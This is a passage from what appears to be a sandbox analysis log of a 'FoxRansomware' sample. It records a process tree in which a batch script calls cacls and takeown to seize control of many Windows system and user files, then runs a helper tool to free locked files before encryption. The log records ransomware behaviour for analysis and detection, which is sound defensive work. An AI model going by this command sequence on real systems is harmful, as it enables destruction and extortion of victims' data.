  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""
  2⤵
  PID:6084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000009B.bin" -nobanner
    3⤵
    PID:6652
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000009B.bin" -nobanner
      4⤵
      PID:1488
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""
  2⤵
  PID:5364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000009L.bin" -nobanner
    3⤵
    PID:5508
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000009L.bin" -nobanner
      4⤵
      PID:3084
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C
    3⤵
    PID:4472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000A6.bin" -nobanner
    3⤵
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000A6.bin" -nobanner
      4⤵
      PID:5904
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""
  2⤵
  PID:5072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C
    3⤵
    PID:7012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"
    3⤵
    PID:6972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000AH.bin" -nobanner
    3⤵
    PID:3036
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000AH.bin" -nobanner
      4⤵
      PID:5924
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""
  2⤵
  PID:6460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"
    3⤵
    PID:6184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000B7.bin" -nobanner
    3⤵
    PID:6756
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000B7.bin" -nobanner
      4⤵
      PID:4680
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:6604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:6312
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:6488
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:6420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    PID:6384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6616
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6296
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml""
  2⤵
  PID:6892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml"
    3⤵
    PID:6592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6564
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6416
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:6208
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:6580
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  2⤵
  PID:5964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
    3⤵
    PID:6500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "DesktopSettings2013.xml" -nobanner
    3⤵
    PID:4784
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "DesktopSettings2013.xml" -nobanner
      4⤵
      PID:6640
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  2⤵
  PID:7084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:6964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    3⤵
    PID:6016
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
      4⤵
      PID:5984
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  2⤵
  PID:532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
    3⤵
    - Modifies file permissions
    PID:7020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    3⤵
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
      4⤵
      PID:6704
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""
  2⤵
  PID:2320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"
    3⤵
    PID:6152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "VdiState.xml" -nobanner
    3⤵
    PID:6404
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "VdiState.xml" -nobanner
      4⤵
      PID:6156
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:6004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:1592
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:7164
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:4772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    PID:7156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:5452
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:5756
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:5612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:5168
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:2100
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5320
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:5508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4056
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    PID:6588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:5152
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      PID:6440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    - Modifies file permissions
    PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      PID:2188
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:6616
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      PID:6324
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:1012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:6200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "background.png" -nobanner
    3⤵
    PID:6556
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5248
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:5228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:6932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5140
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5300
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:6764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1612
